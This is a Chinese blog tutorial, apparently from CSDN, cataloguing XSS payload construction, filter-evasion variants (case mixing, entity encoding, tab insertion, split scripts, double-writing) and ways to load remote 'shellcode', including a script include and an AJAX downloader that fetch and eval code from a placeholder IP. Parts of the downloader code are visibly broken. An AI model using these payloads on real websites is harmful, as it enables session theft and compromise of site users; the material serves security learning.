XSS漏洞利用的构造方法,变形方式,Shellcode的调用

最新推荐文章于 2024-08-03 23:00:16 发布
最新推荐文章于 2024-08-03 23:00:16 发布
阅读量2.2k 收藏 6
点赞数 1
文章标签: html5 html javascript xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47306547/article/details/120520386
版权
本文详细介绍了XSS(跨站脚本)攻击的各种构造方法,包括利用HTML标签、伪协议、事件触发和CSS,以及如何通过大小写转换、引号使用等变形技巧绕过过滤器。同时,探讨了Shellcode的调用方式,如远程加载JS、利用windows.location.hash和XSSDownloader。此外,还提到了将Shellcode存储在客户端技术,如HTTPCookie。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

XSS的构造方法

1.利用 <> 构造HTML/JS

2.伪协议

3.产生自己的事件

4.利用CSS跨站(old)

XSS常用标签

XSS的变形方法

1.大小写转换

2.引号的使用

3.用 / 代替空格

4.回车及Tab

5.对标签属性进行转码

6.拆分跨站

7.双写绕过

8.CSS中的变形

Shellcode 的调用

1.远程调用 JS

2.windows.location.hash

3.XSS Downloader

4.备选存储技术

XSS的构造方法

1.利用 <> 构造HTML/JS

        可以利用 <> 构造 HTML 标签和 <script> 标签

        在测试页面提交参数 <h1 style='color:red'>利用 <> 构造 HTML/JS </h1>

        提交 <script> alert(/xss/) </script>

2.伪协议

        可以使用 jacascript: 伪协议的方式构造 XSS

        javascript:alert(/xss/)

        提交参数 <a href=" javascript:alert(/xss/)"> touch me ! </a>,然后点击超链接,即可触发XSS

        也可以使用 img 标签的伪协议,但是这种方法在IE6下测试成功

        <img src=" javascript:alert(/xss/) ">

        

3.产生自己的事件

        "事件驱动"是一种较为经典的编程思想。在页面中会发生很多事件(比如鼠标移动,价盘输入等),JS可以对这类事件进行相应。所有我们可以通过事件触发JS函数,触发XSS

事件种类注释
Windows 事件对 Windows 对象触发的事件
Form 事件HTML 表单内的动作触发的事件
Keyboard 事件键盘按键
Mouse 事件由鼠标或类似用户动作触发的事件
Media 事件由多媒体触发的事件

                        例如:

<img src="./test.jpg" οnmοuseοver="alert(/xss/)">这个标签会引入一张图片,鼠标悬停在图片上时会触发XSS
<input type="text" οnkeydοwn="alert(/xss/)">点击键盘任意按键触发XSS
<input type="text" οnkeyup="alert(/xss/)">长按任意键停止时触发
<input type="button" οnclick="alert(/xss/)">点击按钮触发
<img src="x " οnerrοr="alert(/xss/)">文件加载错误触发(x 表示任意错误文件)

4.利用CSS跨站(old)

        可以利用CSS(层叠样式脚本)触发XSS,但是此方法比较古老,基本不适合现在主流的浏览器,但是从学习的角度,我们需要了解这种类型的XSS,以下代码在IE6下测试。

行内样式<div style="background-image: url(javascript:alert(/xss/))"></div>
页内样式<style> Body{background-image: url(javascript:alert(/xss/))} </style>
外部样式<link rel="stylesheet" type="text/css" href="./xss.css"><div>hello</div>
expression

<div style="width: expression(alert(/xss/))"></div>

<style> Body{background-image: expression(alert(/xss/));}</style>

import

<style> @import "javascript:alert(/xss/)";</style>

<style type="text/css"> @import url(xss.css);</style><div>AJEST</div>

                    xss.css文件内容

h1{
    color:red;
}
div{
    /*width:expression(alert(/xss/))*/
    background-image:url(javascript:alert(/xss/))
}

XSS常用标签

XSS常用标签

XSS的变形方法

我们可以构造的XSS代码进行各种变形,以绕过XSS过滤器的检测。变形方式主要有以下几种。

1.大小写转换

可以将payload进行大小写转换。例如:

<ImG SrC=' x ' οnerrοr="alert(/xss/)" />

2.引号的使用

HTML应用中对引号的使用不敏感,但是对某些过滤函数是“锱铢必较”

<img src=" x " οnerrοr=" alert(/xss/) " / >

<img src=' x ' οnerrοr=' alert(/xss/) ' / >

<img src=' x ' οnerrοr=alert(/xss/) / >

3.用 / 代替空格

<img/src=' x '/οnerrοr=' alert(/xss/) ' / >

4.回车及Tab

我们可以在一些位置添加 Tab(水平制表符) 和回车符,来绕过关键字检测,

<A hREf=" j

A        v

a        S

c        R

i        p

t        :

alert(/xss/) " > Click me ! </a>

5.对标签属性进行转码

        可以对标签属性值进行转码,用来绕过过滤。对象编码如下:

字母ASCII 码十进制编码十六进制编码
a97&#97;&#x61;
e101&#101;&$x65;

        另外,可以将以下字符插入到任意位置

Tab&#9;
换行&#10;
回车&#13;

        可以将以下字符插入到头部位置

SOH&#01;
STX&#02;

例:<A hREf=" &#01;j&#97;v&#x61;s&#9;c&#10;r&#13;ipt:alert(/xss/) "> Click me ! </a>

6.拆分跨站

<script> z='alert'</script>
<script> z=z+'(/xss/)'</script>
<script> eval(z) </script>

7.双写绕过

        <script>

        <scr<script>ipt>

8.CSS中的变形

        使用全角字符

        注释会被浏览器忽略

                width:expr/*~*/ession(alert(/xss/))

        样式表中的 \ 和 \0

                <style> @import ' javasc\ri\0pt:alert(/xss/) ' ; </script>

Shellcode 的调用

shellcode 就是在利用漏洞所执行的代码

完整的XSS攻击,会将 shellcode 存放在一定的地方,然后触发漏洞,调用 Shellcode。

1.远程调用 JS

可以将JS代码单独放在一个JS文件中,然后通过http协议远程加载该脚本。如

常用方法: <script src=" http://xxx.xxx.xxx.xxx/XSS-TEST/xss.js "></script>

xss.js内容:alert(/xss/);

2.windows.location.hash

我们也可以使用JS中的 windows.location.hash 方法获取浏览器 URL 地址栏的 XSS 代码

windows.location.hash 会获取 URL 中 # 后的内容,例如:http://domain.com/index.php # AJEST ,windows.location.hash 的值就 #AJEST

所以我们可以构造如下代码 ?submit=submit&xsscode=<script>eval(location.hash.substr(1))</script>#alert(/ This is windows.location.hash /),直接提交到测试的页面xss.php

3.XSS Downloader

XSS 下载器是将 XSS代码写到网页中,然后通过 AJAX 技术,获取网页中的XSS代码

在使用 XSS Downloader 之前需要一个我们自己的页面,xss_downloader.php

                        xss_downloader.php

<?php

header(Access-Control-Allow-Origin:*);
header(' Access-Control-Allow-Headers"Origin,X-Requested-With,Content-Type,Accept ');

?>

# 实现跨域访问 AJAX 技术会验证同源策略

~~~~~~ BOF|alert(/xss/)|EOF ~~~~~~
                    常见的下载器


    <script>
        function XSS() {
            if (window.XMLHttpRequest){
                a = new XMLHttpRequest();
            }
            else if (windows.ActiveXObject){
                a = new ActiveXObject(" Microsoft.XMLHTTP ");
            }
            else {
                return;
            }
            a.open('get',' http://xxx.xxx.xxx.xxx/XSS_TEST/xss_downloader.php', false);
            a.send();
            eval(unescape(b.substitute(b.indexOf(' BOF|')+4,b.indexOf(' |EOF '))))
        }
        XSS();
    </script>

4.备选存储技术

我们可以把 Shellcode 存储在客户端的本地域中,比如HTTP Cookie ,Flash共享对象,UserData,localStorage 等。

以 HTTP Cookie 为例

点击 Cookie-XSS 验证,产生如下效果

<meta charset="utf-8">

<?php

    if (setcookie(" name " ," <script>alert(/xss/)</script> ")){
        echo " <a href='./xss.php' target='_blank'>Cookie-XSS 验证</a>a>";
    }
    else{
        echo "设置Cookie失败";
    }

?>

源十三
关注
Poc/Exp漏洞验证利用脚本编写
悦分享
07-07 6154
一、安全名词1. POCPOC,Proof ofConcept,中⽂意思是“观点证明”。这个短语会在漏洞报告中使⽤,漏洞报告中的POC则是⼀段说明或者⼀个攻击的样例,使得读者能够确认这个漏洞是真实存在的。2. EXPEXP,Exploit,中文叫漏洞利用程序。意思就是该漏洞存在公开的利用方式(比如一个脚本),就是一段可以发挥漏洞价值的程序,对漏洞如何利⽤的详细说明或者⼀个演⽰的漏洞攻击代码,可以使得读者完全了解漏洞的机理以及利⽤的⽅法。想象一下这样的场景,目标存在一个 SQL 注入漏洞,然后被你知道了,然后
渗透测试之XSS(跨站脚本攻击)
Hi~ 土拨鼠
12-14 3479
文章目录XSS 漏洞概述XSS 分类XSS 危害XSS 漏洞的验证 XSS 漏洞概述 XSS是OWASP TOP 10 之一。 XSS被称为跨站脚本攻击(Cross-site scripting),本来应该缩写为CSS,但是由于和CSS(cascading Style Sheets,层叠样式脚本)重名,所以更名为XSSXSS(跨站脚本攻击)主要基于javascript(JS)完成恶意的攻击行为。JS 可以非常灵活的操作html、css和浏览器,这使得XSS攻击的“想象"空间特别大。 XSS通过将精心构造的
XSS总结
weixin_51356351的博客
11-19 1663
xss理解 1、简介 xss(cross site script)跨站脚本攻击,为了避免与css混淆,所以简称为xss。 2、什么是xss xss全称叫跨站脚本攻击,因为应用使用了js框架,因为应用未做任何防御措施,导致了攻击者使用对应的payload进行攻击,受害者运行了攻击者的payload,将攻击者所需的cookie发送给了攻击者,最本质的是服务器并没有完全过滤客户端提交的数据 3、xss的危害大吗? 答:很大,是现在web中主流的攻击方式。 4、xss攻击都可以导致哪些危害 (1)钓鱼欺骗 (2)网
xss 利用方式
07-30 855
漏洞原理   HTML是一种超文本标记语言,通过将一些字符特殊地对待来区别文本和标记,例如,小于符号(<)被看作是HTML标签的开始,<title>与</title>之间的字符是页面的标题等等。当动态页面中插入的内容含有这些特殊字符(如<)时,用户浏览器会将其误认为是插入了HTML标签,当这些HTML标签引入了一段JavaScript脚本时,这些脚本...
XSS利用方式
u011215939的博客
01-16 9095
前言 学习XSS注入很久了,XSS主要的情况三分天下:反射型、存储型、DOM型;今天要研究的是XSS利用,曾经有人问我XSS怎么利用的,我也只知道XSS在网页中嵌入代码,获取目标IP、Cookie,但是从来没有实践过,今天浏览FreeBuf时,发现一篇XSS利用文章,哈哈哈……于是乎,实践一下…… 准备 为了获取目标IP及ookie,实践开始之前,需要准备一个东西:VPS
XSS 语句的构造
千寻的博客
01-02 1728
XSS 语句的构造 [第一节]利用[<>]构造HTML/JS [第二节]伪协议—使用javascript: 伪协议的方式构造XSS [第三节]产生自己的事件 [第四节] XSS变形 [第五节]其他标签以及手法 [第六节]利用CSS 跨站(old) 第一节 利用[<>]构造HTML/JS 可以利用[<>] 构造HTML 标签和<script> 标...
web渗透测试----25、跨站脚本攻击简介--(1)XSS构造方法
七天
03-09 1400
XSS构造方法
漏洞利用中的Shellcode编写技巧
Shellcode是一段用来利用软件漏洞的机器代码,它可以被插入到受攻击的程序中,以执行攻击者的指令。Shellcode通常用于获取系统权限、远程控制目标系统、执行恶意操作等。 在漏洞利用中,Shellcode扮演着重要的角色...
通过DVWA学习反射型XSS漏洞
Mi1k7ea
03-04 4994
XSS,全称cross-site scripting,是用于攻击Web客户端而不是服务器端,其最大的特点是能把恶意的JS或HTML代码注入到用户浏览的网页上。而XSS漏洞的存在,主要是由于Web应用程序对用户的输入没有进行严格的过滤所导致的,当攻击者把恶意代码注入到网页时,用户只要访问该网页就会执行其中的恶意代码。关于其更具体的描述在网上也很多资料这里就不多说了直接进行总结整合。 XSS漏洞
【Linux_Kali网络渗透测试学习笔记总结(六)】漏洞利用
数据库爆破专家的博客
04-30 4170
网络渗透测试(六):漏洞利用 编写漏洞利用程序(exploit) 的程序代码都不仅费时费力,而且代码的质量直接关系找整个工作环节的成败。因此,渗透人员需要根据目标环境的实际情况对通过公开渠道获取的exploit程序进行相应调整。这种调整工作的技术含量很高,而且这类工作通常都是触类旁通的。掌握相应技能的人员可以举一反三地对很多程序进行调整。强烈建议读者在编写自己的漏洞利用程序之前,先通过公开渠道获取...
XSS详解及其利用方式
读书 买花 长大
11-14 4150
XSS-xss
XSS漏洞利用方式汇总
热门推荐
Kevin's Blog
05-04 1万+
文章目录一、窃取Cookie1.1 解释1.2 操作搭建xss平台二、 以下所有的针对XSS利用方式都是对XSS的深一步的学习了解、请勿于未授权环境下进行非法操作!!! 一、窃取Cookie 1.1 解释   恶意攻击者通过XSS攻击,窃取其他账户的Cookie信息从而进行未授权非法操作。 1.2 操作 搭建xss平台 这里我直接百度使用一个xss平台来接Cookie Tips:为了安全...
XSS漏洞利用方式总结
XunanSec的博客
05-21 5178
前言: 最近一直在挖漏洞,碰到的XSS漏洞最多了,今天就顺便来讲一下,如有错的地方,烦请指出。 00×1什么是XSS漏洞XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。 ​ 00×2 XSS漏洞有什么危害: 1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号 ...
XSS漏洞利用
LizePing_的博客
07-29 5559
XSS利用利用XSS窃取cookieXSS修改网页XSS获取用户信息XSS+CSRF 组合拳盲打XSS(Blind XSS)利用开启HttpOnly下的利用1.phpinfo页2.框架钓鱼3.跳转钓鱼4.历史密码5.获取源码6.通过xss伪造oauth等授权请求,远程登录其它 利用XSS窃取cookie 窃取cookie是xss利用最常见的手段,攻击者有了cookie就相当于拥有了“管理员”身份。 通常需要配合xss平台来进行攻击,当被攻击者访问到有恶意代码的页面,他的cookie就会被发送到xss平台。
XSS漏洞利用方式分析_xss代码get
喜欢Python编程的程序员柚柚呀
04-12 1212
XSS又叫CSS(Cross Site Script)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。反射型XSS的原理反射型XSS也叫做非持久型XSS,攻击者在URL中插入XSS代码,服务端将URL中的XSS代码输出到页面上,攻击者将带有XSS代码的URL发送给用户,用户打开后受到XSS攻击也叫非储存型,就是通过get或post请求,被后端处理过的数据,并响应到前端页面上存储XSS的原理。
xss漏洞利用方式总结
zlloveyouforever的博客
10-13 3024
XSS漏洞利用方式简单总结。有问题的同学请私信我,文章中网页挂马这一部分确实比较难实现。 此平台优点:界面布局清新、数据可阅读性好、IP获取准确、IP地址定位精准、轻量级(无需数据库)、对数据存储进行加密、GitHub开源方便与开发者交流(生命周期长)。 可以看到,BlueLotus平台还提供了一些js模板,便于我们参考或者构
【网络安全】XSS漏洞- XSS基础概述及利用
goldfish8848的博客
06-12 1865
跨站脚本(Cross-site Scripting)攻击,攻击者通过网站注入点注入客户端可执行解析的payload(脚本代码),当用户访问网页时,恶意payload自动加载并执行,以达到攻击者目的(窃取cookie、恶意传播、钓鱼欺骗等)为了避免与HTML中的CSS相混淆,通常称它为XSS
教大家如何找XSS漏洞并且利用
liuhyusb的博客
06-19 1922
cross sitescript跨站脚本攻击,为了避免和css重复,就叫XSS了,是客户端脚本安全中的头号大敌。
xss漏洞(三,xss进阶利用
最新发布
2302_80280669的博客
08-03 923
假如dvwa是你常用的网站,并且已经登录,你不知道此页面存在xss注入,黑客利用xss漏洞获取你cookie.他先打开此网站,构造了恶意语句,然后拿到URL,把URL进行包装,最后发给受害者你,你作为受害者一点击,自己的cookie就发送到了黑客特定的的文件里,黑客就拿到了你的cookie。本段代码的整体含义为:插入地址为1的图片,若无法执行(报错),便执行弹窗为‘hello’的操作。标签是将一张图嵌入的意思,src=后跟所嵌入的图片地址,onError=后跟若前面的代码无法执行所进行的操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值